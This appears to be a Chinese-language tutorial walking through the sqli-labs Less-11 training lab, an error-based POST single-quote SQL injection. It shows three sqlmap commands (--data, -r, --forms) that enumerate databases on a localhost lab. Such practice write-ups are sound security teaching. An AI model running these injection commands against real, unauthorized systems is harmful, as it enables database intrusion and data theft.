Java教程
sqli-labs less11 基于错误的POST型单引号字符型注入(sqlmap)
本文主要是介绍sqli-labs less11 基于错误的POST型单引号字符型注入(sqlmap),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
sqli-labs less11 基于错误的POST型单引号字符型注入
- 一、知识储备
- 二、验证漏洞
- 方法一:--data
- 方法二:-r
- 方法三:--forms
一、知识储备
针对post型的表单,sqlmap有三种参数可验证:
–data 需要自己手工找到参数名以及一些信息
-r 需要自己抓包
–forms sqlmap中的自动抓包获取参数,最方便
二、验证漏洞
首先打开less11;
提交任意数据,用burp抓包;
记下post请求参数;uname=1111&passwd=11111&submit=Submit
这里介绍三种方法去检验该漏洞,满足一种证明该漏洞基本存在。
方法一:–data
找到需要提交的post参数,输入下面命令,–dbs枚举所有数据库名称;
python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-11/ --data="uname=1111&passwd=11111&submit=Submit" --dbs
方法二:-r
将提交的报文抓包后,把信息存储在一个txt文件中,输入下面命令,–dbs枚举所有数据库名称;
python sqlmap.py -r 文件路径+文件名.txt --dbs
方法三:–forms
利用该命令,使sqlmap自己抓包,输入下面命令,–dbs枚举所有数据库名称
python sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-11/ --forms --level=5 --dbs
这时证明该漏洞确实存在。
这篇关于sqli-labs less11 基于错误的POST型单引号字符型注入(sqlmap)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
Springboot应用的多环境打包入门11-23
-
Springboot应用的生产发布入门教程11-23
-
Python编程入门指南11-23
-
Java创业入门:从零开始的编程之旅11-23
-
Java创业入门:新手必读的Java编程与创业指南11-23
-
Java对接阿里云智能语音服务入门详解11-23
-
Java对接阿里云智能语音服务入门教程11-23
-
JAVA对接阿里云智能语音服务入门教程11-23
-
Java副业入门:初学者的简单教程11-23
-
JAVA副业入门:初学者的实战指南11-23
-
JAVA项目部署入门:新手必读指南11-23
-
Java项目部署入门:新手必看指南11-23
-
Java项目部署入门:新手必读指南11-23
-
Java项目开发入门:新手必读指南11-23
-
JAVA项目开发入门:从零开始的实用教程11-23
栏目导航
